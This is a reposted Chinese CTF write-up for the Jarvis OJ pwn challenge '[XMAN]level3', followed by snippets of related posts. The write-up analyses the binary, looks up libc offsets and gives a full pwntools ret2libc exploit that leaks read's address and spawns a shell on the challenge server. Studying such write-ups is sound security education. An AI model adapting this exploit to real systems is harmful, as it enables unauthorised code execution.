2. 程式人生 > >Jarvis OJ-PWN-[XMAN]level3 wp

Jarvis OJ-PWN-[XMAN]level3 wp

阿新 發佈:2018-12-15

地址:nc pwn2.jarvisoj.com 9879

一開始拿到題目的時候是一個rar檔案 在這裡插入圖片描述 解壓後就得到了兩個檔案 對這兩個檔案檢視保護 在這裡插入圖片描述 兩個檔案都是32位的 level3沒有開啟棧保護 可以利用棧溢位;棧中內容不可使用 不用shellcode 可以看到是全部都開啟了

用IDA32開啟level3 在這裡插入圖片描述 跟進vulnerable_function()函式 在這裡插入圖片描述 溢位點在read上 棧溢位的目的是執行system("/bin/sh") 但是我們並沒有找到相關的函式和字串 在這裡插入圖片描述 那麼就需要通過read構造棧溢位 並覆蓋返回地址

總結為以下三步:

  1. 通過vulnerable_function()函式中的read構造棧溢位 並覆蓋返回地址為plt中的write
  2. 通過write洩露出read在記憶體中的絕對地址,並且呼叫vulnerable_function()
  3. 計算出system和/bin/sh的絕對地址,再通過vulnerable_function()構造棧溢位進行復寫

寫指令碼前先在libc.so中搜一下幾個關鍵函式和字串

[email protected]:~/Desktop/Pwn/level3# readelf -a ./libc-2.19.so |grep "[email protected]"
   571: 000daf60   125 FUNC    WEAK   DEFAULT   12 [email protected]
 
@GLIBC_2.0
   705: 0006f220    50 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
   950: 000daf60   125 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.0
  1166: 000e0c40  1461 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
  1263: 000ec390    46 FUNC    GLOBAL DEFAULT   12 [email protected]
 
@GLIBC_2.7
  1698: 000643a0   259 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.0
  2181: 000c3030   204 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.1
  2300: 000643a0   259 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
[email protected]:~/Desktop/Pwn/level3# readelf -a ./libc-2.19.so |grep "[email protected]"
   620: 00040310    56 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_PRIVATE
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.0
[email protected]:~/Desktop/Pwn/level3# readelf -a ./libc-2.19.so |grep "[email protected]"
   111: 00033690    58 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.10
   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
   554: 000b5f24    24 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
   609: 0011c2a0    56 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
   645: 00033660    45 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.10
   868: 00033490    84 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.1.3
  1037: 00126800    60 FUNC    GLOBAL DEFAULT   12 [email protected]_2.0
  1492: 000f9160    62 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
  2243: 00033290    77 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.0
  2386: 000f9cd0     2 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.2
[email protected]:~/Desktop/Pwn/level3# strings -a -t x ./libc-2.19.so | grep "/bin/sh"
 16084c /bin/sh

篩選之後得到

   950: 000daf60   125 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.0
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.0
   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
 16084c /bin/sh

最後寫exp

from pwn import *
r=remote('pwn2.jarvisoj.com',9879)
e=ELF('./level3')
 
plt_write=hex(e.plt['write'])
got_read=hex(e.got['read'])
vulfuncadr=hex(e.symbols['vulnerable_function'])
plt_write_args=p32(0x01)+p32(int(got_read,16))+p32(0x04)
#呼叫順序:func1_address+func2_adress+……+func1_argslist+func2_argslist+……
payload1='A'*(0x88+0x4)+p32(int(plt_write,16))+p32(int(vulfuncadr,16))+plt_write_args
 
r.recv()
r.send(payload1)
readadr=hex(u32(r.recv()))#洩露read絕對地址
 
#   950: 000daf60   125 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.0
#  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.0
#   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
# 16084c /bin/sh
 
libc_read=0x000DAF60
offset=int(readadr,16)-libc_read #計算偏移量
sysadr=offset+0x00040310 #system絕對地址
xitadr=offset+0x00033260 #exit絕對地址
bshadr=offset+0x0016084C #binsh絕對地址
payload2='A'*(0x88+0x4)+p32(sysadr)+p32(xitadr)+p32(bshadr)
 
r.send(payload2)
r.interactive()

在這裡插入圖片描述

本文大部分參考https://blog.csdn.net/cossack9989/article/details/79326659

相關推薦

Jarvis OJ-PWN-[XMAN]level3 wp

地址:nc pwn2.jarvisoj.com 9879 一開始拿到題目的時候是一個rar檔案 解壓後就得到了兩個檔案 對這兩個檔案檢視保護 兩個檔案都是32位的 level3沒有開啟棧保護 可以利用棧溢位;棧中內容不可使用 不用shellcode 可以看

Jarvis OJ-PWN-[XMAN]level0 wp

地址:nc pwn2.jarvisoj.com 9881 第一次做pwn的題目 先準備一下環境 1.pwntools sudo pip install pwntools 2.python sudo apt install python-pip 先開啟虛擬機器

18.9.18 Jarvis OJ PWN----[XMAN]level0

拖進IDA 看到有函式callsystem,那就直接把主函式往它身上引 在vulnerable裡有緩衝區,試著溢位 ebp偏移量0x80個位元組,覆蓋後再用8個位元組覆蓋儲存的ebp,然後將返回地址設為callsystem函式的地址 指令碼 #coding=ut

18.9.20 Jarvis OJ PWN----[XMAN]level4

checksec之後,發現可以棧溢位 找可以溢位的地方 我們可以讀取無窮無盡的數 但是在IDA中沒找到system函式,同時題目也沒有給我們lib檔案,咋辦………… 根據大佬的資料,瞭解到了pwntools的一個函式DynELF,DynELF函式可以leak

Jarvis Oj Pwn 學習筆記-level1

ID lin send add 技術分享 r+ rar bsp strong 32位pwn題目 呈上鏈接: https://files.cnblogs.com/files/Magpie/level1.rar nc pwn2.jarvisoj.com 9877 先看一下保護:

Jarvis OJ reverse之androideasy wp

這是一道我第一次解出的安卓逆向類CTF題目,下面記錄並分享一下思路。 一,把檔案下載下來,開啟是一個apk檔案,用jeb反編譯(找到MainAcitivity,然後右鍵Decompile即可)得到java程式碼。 package com.a.sample.androidtest; impo

Jarvis OJ - [XMAN]level3 - Writeup——rop2libc嘗試

但是 可執行程序 pre 問題 com pad arch 進行 sea 這次除了elf程序還附帶一個動態鏈接庫 先看一下,很一般的保護 思路分析 在ida中查看,可以確定通過read函數輸入buf進行溢出,但是並沒有看到合適的目標函數 但是用ida打開附帶的鏈接庫

Jarvis OJ - [XMAN]level1 - Writeup

shellcode text ext recv 函數 rec spa 偏移 shell Jarvis OJ - [XMAN]level1 - Writeup M4x原創,轉載請表明出處http://www.cnblogs.com/WangAoBo/p/7594173.ht

Jarvis OJ - [XMAN]level1 - Writeup——簡單shellcode利用

adding lan raft 截取 eight .sh close ott 作者 100分的pwn 簡單查看一下,果然還是比較簡單的 放到ida中查看一下,有明顯的溢出函數,並且在函數中打印出了字符串的地址,並且字符串比較長,沒有NX保護 所以我們很容易想到

[轉]Jarvis OJ- [XMAN]level2/3_x64-Writeup

article lan line get adg net asc 32位 lba 學弟寫的挺好的,我就直接轉過來了 原文鏈接:http://www.cnblogs.com/ZHijack/p/7940686.html 兩道64位棧溢出,思路和之前

Jarvis oj level3

下載下來發現有level3檔案和libc.so檔案,先checksec,和level2差不多,接著ida開啟level3,沒找到system函式和bin字串,沒什麼辦法了。接著去看so檔案,libc是Linux下的ANSI C的函式庫。找到了system函式和bin字串。那麼怎麼利用呢?

Jarvis OJ- [XMAN]level2/3_x64-Writeup——64位簡單棧溢位

兩道64位棧溢位,思路和之前的32位溢位基本一致,所以放在一起 在這兩道中體現的32位和64位的主要區別在於函式引數傳遞的方式 在32位程式執行中,函式引數直接壓入棧中     呼叫函式時棧的結構為:呼叫函式地址->函式的返回地址->引數n->引數n-1->···->引數1 在6

Jarvis OJ - DD-Hello -Writeup

真的 ida os x jpg 又一 可執行 idt block 題目 Jarvis OJ - DD-Hello -Writeup 轉載請註明出處http://www.cnblogs.com/WangAoBo/p/7239216.html 題目: 分析: 第一次做這道

jarvis OJ

basic Baby’s Crack 程式大概就是開啟一個命令列輸入的 file,然後開啟一個 tmp,對 file 加密寫入 tmp,將 file 刪除,將 tmp 重新命名為 file。 直接在 ida 中 F5,關鍵的程式碼就是: while (feof(*(_QWOR

[Jarvis OJ] -Basic

https://www.jarvisoj.com/challenges Basic -.-字串 請選手觀察以下密文並轉換成flag形式 ..-. .-.. .- --. ..... ..--- ..--- ----- .---- ---.. -.. -.... -.... ..... ...-- ---

Jarvis OJ-Login

Login 時間:2018年10月3日 彙報人:王禕潔 題目 題解 檢視頁面原始碼一無所獲,採取抓包,隨便輸入一串試一下。 抓個包, 發現後臺查詢password的語句,這是一個md5加密後的sql注入。 md5($pass, true): 引

Jarvis OJ-IN A Mess

IN A Mess 時間:2018年10月6日 彙報人:王禕潔 題目 題解 進入頁面,發現沒啥,檢視原始碼,發現index.phps 進入後讀程式碼,發現三個引數:a,b,id。 id:id==0典型的PHP弱比較,利用id=0a或id=0e1

jarvis oj level5

level5要求不用system和execve,而是用mprotect和mmap,查了一下,mmap主要是將檔案對映到一段記憶體去同時設定那段記憶體的屬性可讀可寫或者是可執行,mprotect函式是將從addr開始的地址 ,長度位len的記憶體的訪問許可權。毫無頭緒。查了網上大神的wp,才知

jarvis oj level3_x64

level3_x64裡沒有找到system函式,但給了libc.so檔案,應該是和level3一樣的想法。 先找到操作暫存器的地址,因為write需要3個引數,所以需要rdi,rsi,rdx。但我們搜尋只找到了rdi和rsi。 0x00000000004006b3 : pop rdi ;

jarvis oj level2_x64

接下來做64位了,首先看下和32位有什麼不一樣。這篇文章的第3節說的很詳細 主要來說就是: 1.記憶體地址的範圍由32位變成了64位,但是可以使用的記憶體地址不能大於0x00007fffffffffff,否則會丟擲異常。 2.x64中的前六個引數依次儲存在RDI,RSI,RDX,RCX,R8